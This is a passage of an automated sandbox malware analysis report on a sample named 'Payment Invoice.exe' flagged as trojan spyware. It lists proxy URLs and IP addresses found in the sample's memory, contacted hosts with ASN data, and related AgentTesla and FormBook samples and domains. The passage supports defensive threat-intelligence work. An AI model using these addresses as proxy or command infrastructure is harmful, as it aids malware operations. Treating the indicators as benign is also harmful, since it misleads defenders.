                                http://91.134.140.160:27207://proxyPayment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                low
                                http://72.10.160.170:5385://proxyPayment Invoice.exe, 00000000.00000002.3288321931.0000016317066000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                low
                                http://152.32.132.220://proxyPayment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://94.131.203.7:8080Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://46.21.153.16:3128://proxyPayment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                low
                                http://103.216.51.36:32650Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://149.126.101.162:8080://proxyPayment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                low
                                http://188.132.222.194:8080://proxyPayment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                low
                                http://107.180.90.88:20309Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://184.178.172.14:4145://proxyPayment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                low
                                http://221.153.92.39:80Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://186.219.96.12:52017://proxyPayment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                low
                                http://72.10.164.178:1431://proxyPayment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                low
                                http://188.165.252Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                low
                                http://183.88.184.48:8080Payment Invoice.exe, 00000000.00000002.3288321931.0000016317D92000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://159.192.102.249:8080://proxyPayment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                low
                                http://62.99.138.162://proxyPayment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://104.19.235.10Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://103.217.213.145:4145://proxyPayment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                low
                                http://111.59.4.88:9002://proxyPayment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                low
                                http://45.65.137.218:9990qPayment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                low
                                http://51.81.186.179:51405://proxyPayment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                low
                                http://86.107.178.103:3128://proxyPayment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                low
                                http://62.141.70.118:80Payment Invoice.exe, 00000000.00000002.3288321931.0000016319CD6000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://31.43.179.160:80Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://174.64.199.82:4145://proxyPayment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                low
                                http://162.214.225.223:40536Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://92.205.110.118:15430Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://115.240.163.31Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://72.195.34.59:4145://proxyPayment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                low
                                http://160.3.168.70:8080Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://32.223.6.94:80Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://161.97.173.42:50386://proxyPayment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                low
                                http://103.234.24.105:8880Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://66.29.129.53:14464://proxyPayment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                low
                                http://145.239.199.109:3128Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://61.216.156.222:60808://proxyPayment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                low
                                http://141.95.160.178:5870Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://104.17.166.210:80Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://169.57.157.146:8123Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://223.25.100.42:2222://proxyPayment Invoice.exe, 00000000.00000002.3288321931.00000163186EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                low
                                http://114.99.13.192:8004://proxyPayment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                low
                                http://103.131.8.27:5678Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://104.247.163.246:3825Payment Invoice.exe, 00000000.00000002.3288321931.0000016317BEE000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://162.241.6.97:45629://proxyPayment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                low
                                http://104.16.109.143Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://84.241.8.234:8080Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://137.184.200.42:8000://proxyPayment Invoice.exe, 00000000.00000002.3288321931.00000163170E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                low
                                http://162.55.87.48:5566://proxyPayment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                low
                                http://185.202.165.1:53281://proxyPayment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                low
                                http://5.135.83.214:80Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://50.168.210.239:80Payment Invoice.exe, 00000000.00000002.3288321931.0000016317066000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://185.129.250.183Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://45.174.87.18:999://proxyPayment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                low
                                http://50.231.110.26://proxyPayment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://162.214.165.6:42624://proxyPayment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                low
                                http://37.26.223.96:9080://proxyPayment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                low
                                http://35.207.123.94://proxyPayment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://185.49.31.207:8081://proxyPayment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                low
                                http://209.250.248.127:45534://proxyPayment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                low
                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs
                                IPDomainCountryFlagASNASN NameMalicious
                                93.171.243.253
                                unknownCzech Republic
                                8870OVDC-ASUAfalse
                                212.110.188.202
                                unknownUnited Kingdom
                                35425BYTEMARK-ASGBtrue
                                24.230.33.96
                                unknownUnited States
                                11232MIDCO-NETUSfalse
                                43.128.107.251
                                unknownJapan4249LILLY-ASUSfalse
                                182.160.100.156
                                unknownBangladesh
                                24323AAMRA-NETWORKS-AS-APaamranetworkslimitedBDfalse
                                50.169.37.50
                                unknownUnited States
                                7922COMCAST-7922USfalse
                                103.216.51.36
                                unknownCambodia
                                135375TCC-AS-APTodayCommunicationCoLtdKHtrue
                                193.143.1.201
                                unknownunknown
                                57271BITWEB-ASRUtrue
                                78.90.252.7
                                unknownBulgaria
                                20911NETSURF-AS-BGfalse
                                82.137.245.31
                                unknownSyrian Arab Republic
                                29256INT-PDN-STE-ASSTEPDNInternalASSYfalse
                                193.124.189.13
                                unknownRussian Federation
                                35196IHOR-ASRUfalse
                                177.67.136.241
                                unknownBrazil
                                52663TurboBSBTecnologiasemRedeLtdaBRfalse
                                51.15.139.15
                                unknownFrance
                                12876OnlineSASFRfalse
                                181.78.11.217
                                unknownArgentina
                                52468UFINETPANAMASAPAfalse
                                194.44.177.225
                                unknownUkraine
                                3255UARNET-ASUARNetUAfalse
                                94.154.152.9
                                unknownAlbania
                                209842CYBEXEREEfalse
                                89.168.121.175
                                unknownUnited Kingdom
                                9105TISCALI-UKTalkTalkCommunicationsLimitedGBfalse
                                181.78.11.218
                                unknownArgentina
                                52468UFINETPANAMASAPAfalse
                                139.224.64.191
                                unknownChina
                                37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
                                94.154.152.4
                                unknownAlbania
                                209842CYBEXEREEfalse
                                41.155.190.214
                                unknownEgypt
                                37069MOBINILEGfalse
                                13.234.24.116
                                unknownUnited States
                                16509AMAZON-02USfalse
                                180.178.104.110
                                unknownIndonesia
                                38758HYPERNET-AS-IDPTHIPERNETINDODATAIDfalse
                                31.43.63.70
                                unknownUkraine
                                50581UTGUAfalse
                                103.4.118.130
                                unknownBangladesh
                                38203ADNTELECOMLTD-BDADNTelecomLtdBDfalse
                                103.74.229.133
                                unknownBangladesh
                                131340TAQWAIT-AS-APMdMozammelHoquetaTaqwaITBDfalse
                                52.35.240.119
                                unknownUnited States
                                16509AMAZON-02USfalse
                                103.25.210.102
                                unknownIndonesia
                                132653B-LINK-AS-IDPTTransdataSejahteraIDfalse
                                101.51.121.29
                                unknownThailand
                                23969TOT-NETTOTPublicCompanyLimitedTHfalse
                                146.19.106.42
                                unknownFrance
                                7726FITC-ASUSfalse
                                51.81.89.146
                                unknownUnited States
                                16276OVHFRfalse
                                46.17.63.166
                                unknownUnited Kingdom
                                39326HSO-GROUPGBfalse
                                114.129.2.82
                                unknownJapan7671MCNETNTTSmartConnectCorporationJPfalse
                                62.171.131.101
                                unknownUnited Kingdom
                                51167CONTABODEtrue
                                216.74.255.182
                                unknownUnited States
                                11215LOGIXCOMM-ASUSfalse
                                103.220.205.162
                                unknownBangladesh
                                59362KSNETWORK-AS-APKSNetworkLimitedBDfalse
                                38.127.172.219
                                unknownUnited States
                                174COGENT-174USfalse
                                14.161.17.4
                                unknownViet Nam
                                45899VNPT-AS-VNVNPTCorpVNfalse
                                183.164.254.8
                                unknownChina
                                4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                                103.47.93.252
                                unknownIndia
                                9830SWIFTONLINE-AS-APSWIFTONLINEBORDERASINtrue
                                194.9.80.1
                                unknownunknown
                                206495IR-SADRA-20180529IRfalse
                                212.110.188.222
                                unknownUnited Kingdom
                                35425BYTEMARK-ASGBtrue
                                148.135.119.4
                                unknownSweden
                                158ERI-ASUSfalse
                                202.162.105.202
                                unknownSingapore
                                64050BCPL-SGBGPNETGlobalASNSGfalse
                                67.205.177.122
                                unknownUnited States
                                14061DIGITALOCEAN-ASNUSfalse
                                212.110.188.220
                                unknownUnited Kingdom
                                35425BYTEMARK-ASGBtrue
                                14.232.160.247
                                unknownViet Nam
                                45899VNPT-AS-VNVNPTCorpVNfalse
                                185.215.53.241
                                unknownArmenia
                                205368FNETAMfalse
                                67.213.210.115
                                unknownUnited States
                                32780HOSTINGSERVICES-INCUSfalse
                                67.213.210.118
                                unknownUnited States
                                32780HOSTINGSERVICES-INCUStrue
                                172.67.200.220
                                unknownUnited States
                                13335CLOUDFLARENETUSfalse
                                38.253.88.242
                                unknownUnited States
                                174COGENT-174USfalse
                                13.59.156.167
                                unknownUnited States
                                16509AMAZON-02USfalse
                                34.176.113.148
                                unknownUnited States
                                2686ATGS-MMD-ASUSfalse
                                212.110.188.216
                                unknownUnited Kingdom
                                35425BYTEMARK-ASGBtrue
                                103.47.93.242
                                unknownIndia
                                9830SWIFTONLINE-AS-APSWIFTONLINEBORDERASINtrue
                                212.110.188.211
                                unknownUnited Kingdom
                                35425BYTEMARK-ASGBtrue
                                103.47.93.236
                                unknownIndia
                                9830SWIFTONLINE-AS-APSWIFTONLINEBORDERASINtrue
                                101.95.182.26
                                unknownChina
                                4812CHINANET-SH-APChinaTelecomGroupCNfalse
                                212.110.188.213
                                unknownUnited Kingdom
                                35425BYTEMARK-ASGBtrue
                                35.207.123.94
                                unknownUnited States
                                19527GOOGLE-2USfalse
                                183.215.23.242
                                unknownChina
                                56047CMNET-HUNAN-APChinaMobilecommunicationscorporationCNfalse
                                103.189.96.98
                                unknownunknown
                                7575AARNET-AS-APAustralianAcademicandResearchNetworkAARNefalse
                                103.153.63.211
                                unknownunknown
                                134687TWIDC-AS-APTWIDCLimitedHKfalse
                                96.80.235.1
                                unknownUnited States
                                7922COMCAST-7922USfalse
                                129.18.164.130
                                unknownNigeria
                                36923SWIFTNG-ASNNGfalse
                                148.72.23.56
                                unknownUnited States
                                26496AS-26496-GO-DADDY-COM-LLCUStrue
                                188.40.44.95
                                unknownGermany
                                24940HETZNER-ASDEfalse
                                103.99.27.26
                                unknownunknown
                                136920GARDAMORLDA-AS-APGardamorLdaTLfalse
                                188.163.170.130
                                unknownUkraine
                                15895KSNET-ASUAfalse
                                81.250.223.126
                                unknownFrance
                                3215FranceTelecom-OrangeFRfalse
                                218.252.244.126
                                unknownHong Kong
                                9908HKCABLE2-HK-APHKCableTVLtdHKfalse
                                191.101.1.116
                                unknownChile
                                61317ASDETUKhttpwwwheficedcomGBfalse
                                94.131.14.66
                                unknownUkraine
                                29632NASSIST-ASGIfalse
                                103.47.93.231
                                unknownIndia
                                9830SWIFTONLINE-AS-APSWIFTONLINEBORDERASINtrue
                                212.110.188.207
                                unknownUnited Kingdom
                                35425BYTEMARK-ASGBtrue
                                103.47.93.225
                                unknownIndia
                                9830SWIFTONLINE-AS-APSWIFTONLINEBORDERASINtrue
                                118.173.230.19
                                unknownThailand
                                23969TOT-NETTOTPublicCompanyLimitedTHfalse
                                51.15.139.59
                                unknownFrance
                                12876OnlineSASFRfalse
                                104.17.9.114
                                unknownUnited States
                                13335CLOUDFLARENETUSfalse
                                121.129.47.25
                                unknownKorea Republic of
                                4766KIXS-AS-KRKoreaTelecomKRfalse
                                45.235.16.121
                                unknownBrazil
                                267406AGOBrasilInternetLtdaBRfalse
                                112.78.161.191
                                unknownIndonesia
                                17451BIZNET-AS-APBIZNETNETWORKSIDfalse
                                200.174.198.95
                                unknownBrazil
                                4230CLAROSABRfalse
                                20.33.5.27
                                unknownUnited States
                                8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                45.224.247.102
                                unknownBrazil
                                266925UPIXNETWORKSBRfalse
                                45.190.78.50
                                unknownunknown
                                269702CAMPINETINTERNETVIARADIOEIRELIBRfalse
                                103.47.93.221
                                unknownIndia
                                9830SWIFTONLINE-AS-APSWIFTONLINEBORDERASINtrue
                                103.47.93.220
                                unknownIndia
                                9830SWIFTONLINE-AS-APSWIFTONLINEBORDERASINtrue
                                185.36.191.240
                                unknownUkraine
                                42159DELTAHOST-ASUAfalse
                                103.216.49.233
                                unknownCambodia
                                135375TCC-AS-APTodayCommunicationCoLtdKHfalse
                                180.104.0.161
                                unknownChina
                                137702CHINATELECOM-JIANGSU-NANJING-IDCNanjingJiangsuProvincefalse
                                172.67.181.9
                                unknownUnited States
                                13335CLOUDFLARENETUSfalse
                                14.143.172.238
                                unknownIndia
                                4755TATACOMM-ASTATACommunicationsformerlyVSNLisLeadingISPfalse
                                103.47.93.219
                                unknownIndia
                                9830SWIFTONLINE-AS-APSWIFTONLINEBORDERASINtrue
                                104.236.0.129
                                unknownUnited States
                                14061DIGITALOCEAN-ASNUSfalse
                                38.127.179.100
                                unknownUnited States
                                174COGENT-174USfalse
                                103.47.93.216
                                unknownIndia
                                9830SWIFTONLINE-AS-APSWIFTONLINEBORDERASINtrue
                                185.167.59.215
                                unknownMoldova Republic of
                                43783CAGHETPLUS-ASMoldtelecomMDfalse
                                14.232.235.13
                                unknownViet Nam
                                45899VNPT-AS-VNVNPTCorpVNfalse
                                Joe Sandbox version:40.0.0 Tourmaline
                                Analysis ID:1406718
                                Start date and time:2024-03-11 16:13:57 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 7m 47s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:11
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:Payment Invoice.exe
                                Detection:MAL
                                Classification:mal100.spre.troj.spyw.evad.winEXE@6/4@6/100
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:
                                • Successful, ratio: 100%
                                • Number of executed functions: 71
                                • Number of non-executed functions: 12
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                • Excluded IPs from analysis (whitelisted): 23.202.57.177, 72.21.81.240, 13.85.23.86, 192.229.211.108, 52.165.164.15, 13.95.31.18
                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, wu.ec.azureedge.net, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wu-bg-shim.trafficmanager.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, e16604.g.akamaiedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, hlb.apr-52dd2-0.edgecastdns.net, sls.update.microsoft.com, prod.fs.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size exceeded maximum capacity and may have missing network information.
                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                • Report size getting too big, too many NtCreateFile calls found.
                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                • Report size getting too big, too many NtSetInformationFile calls found.
                                • VT rate limit hit for: Payment Invoice.exe
                                TimeTypeDescription
                                16:15:12API Interceptor83x Sleep call for process: Payment Invoice.exe modified
                                16:15:28API Interceptor485961x Sleep call for process: MSBuild.exe modified
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                93.171.243.253DHL DETAILS.exeGet hashmaliciousAgentTeslaBrowse
                                  https://waltondev2.com/c.phpGet hashmaliciousPhisherBrowse
                                    SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeGet hashmaliciousAgentTeslaBrowse
                                      PO #1131011152-2024-Order,pdf.exeGet hashmaliciousAgentTeslaBrowse
                                        SecuriteInfo.com.Win64.ExploitX-gen.17969.12173.exeGet hashmaliciousAgentTeslaBrowse
                                          FEDEX & INVOICE.Tracking Details.exeGet hashmaliciousAgentTeslaBrowse
                                            212.110.188.202PAYMENT.exeGet hashmaliciousAgentTeslaBrowse
                                            • artemis-rat.comartemis-rat.com:443
                                            PO23656PDFF.exeGet hashmaliciousAgentTeslaBrowse
                                            • artemis-rat.comartemis-rat.com:443
                                            dl7WL77rkA.exeGet hashmaliciousGlupteba, Mars Stealer, Stealc, VidarBrowse
                                            • artemis-rat.comartemis-rat.com:443
                                            DHL EXPRESS.exeGet hashmaliciousAgentTeslaBrowse
                                            • artemis-rat.comartemis-rat.com:443
                                            Customer's Requirements and Pricing Details.exeGet hashmaliciousAgentTeslaBrowse
                                            • artemis-rat.comartemis-rat.com:443
                                            HtfOQz42tN.exeGet hashmaliciousUnknownBrowse
                                            • heygirlisheeverythingyouwantedinaman.comheygirlisheeverythingyouwantedinaman.com:443
                                            3011574829.exeGet hashmaliciousUnknownBrowse
                                            • artemis-rat.comartemis-rat.com:443
                                            75C8OqdJUQ.exeGet hashmaliciousUnknownBrowse
                                            • heygirlisheeverythingyouwantedinaman.comheygirlisheeverythingyouwantedinaman.com:443
                                            Urgent Quotation required .exeGet hashmaliciousAgentTeslaBrowse
                                            • heygirlisheeverythingyouwantedinaman.comheygirlisheeverythingyouwantedinaman.com:443
                                            Quote 00123.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                            • heygirlisheeverythingyouwantedinaman.comheygirlisheeverythingyouwantedinaman.com:443
                                            24.230.33.96RFQ__ PO-7647454645_PDF.exeGet hashmaliciousAgentTeslaBrowse
                                              copia TT allegata.exeGet hashmaliciousAgentTeslaBrowse
                                                ADSFDGHJs#U034fx#U034fl#U034fx#U034f..exeGet hashmaliciousFormBookBrowse
                                                  OUTSTANDING PO.exeGet hashmaliciousFormBookBrowse
                                                    ENQUIRY FOR QUOTATION.exeGet hashmaliciousAgentTeslaBrowse
                                                      PAYMENT.exeGet hashmaliciousAgentTeslaBrowse
                                                        Urgent request for a quote.exeGet hashmaliciousAgentTeslaBrowse
                                                          Your file name without extension goes here.exeGet hashmaliciousAgentTeslaBrowse
                                                            PO23656PDFF.exeGet hashmaliciousAgentTeslaBrowse
                                                              SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeGet hashmaliciousAgentTeslaBrowse
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                ktxcomay.com.vnRFQ__ PO-7647454645_PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 222.255.238.159
                                                                copia TT allegata.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 222.255.238.159
                                                                ADSFDGHJs#U034fx#U034fl#U034fx#U034f..exeGet hashmaliciousFormBookBrowse
                                                                • 222.255.238.159
                                                                OUTSTANDING PO.exeGet hashmaliciousFormBookBrowse
                                                                • 222.255.238.159
                                                                ENQUIRY FOR QUOTATION.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 222.255.238.159
                                                                PAYMENT.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 222.255.238.159
                                                                Urgent request for a quote.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 222.255.238.159
                                                                Your file name without extension goes here.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 222.255.238.159
                                                                PO23656PDFF.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 222.255.238.159
                                                                SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 222.255.238.159
                                                                artemis-rat.comRFQ__ PO-7647454645_PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 172.67.140.87
                                                                copia TT allegata.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 172.67.140.87
                                                                ADSFDGHJs#U034fx#U034fl#U034fx#U034f..exeGet hashmaliciousFormBookBrowse
                                                                • 104.21.54.158
                                                                OUTSTANDING PO.exeGet hashmaliciousFormBookBrowse
                                                                • 104.21.54.158
                                                                ENQUIRY FOR QUOTATION.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 104.21.54.158
                                                                PAYMENT.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 104.21.54.158
                                                                Urgent request for a quote.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 104.21.54.158
                                                                PO23656PDFF.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 172.67.140.87
                                                                SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 104.21.54.158
                                                                dl7WL77rkA.exeGet hashmaliciousGlupteba, Mars Stealer, Stealc, VidarBrowse
                                                                • 104.21.54.158
                                                                github.comRFQ__ PO-7647454645_PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 140.82.114.3
                                                                copia TT allegata.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 140.82.113.3
                                                                ADSFDGHJs#U034fx#U034fl#U034fx#U034f..exeGet hashmaliciousFormBookBrowse
                                                                • 140.82.112.3
                                                                OUTSTANDING PO.exeGet hashmaliciousFormBookBrowse
                                                                • 140.82.114.4
                                                                rustdesk-1.2.4-x86_64 ITSUR.exeGet hashmaliciousBazaLoaderBrowse
                                                                • 140.82.114.3
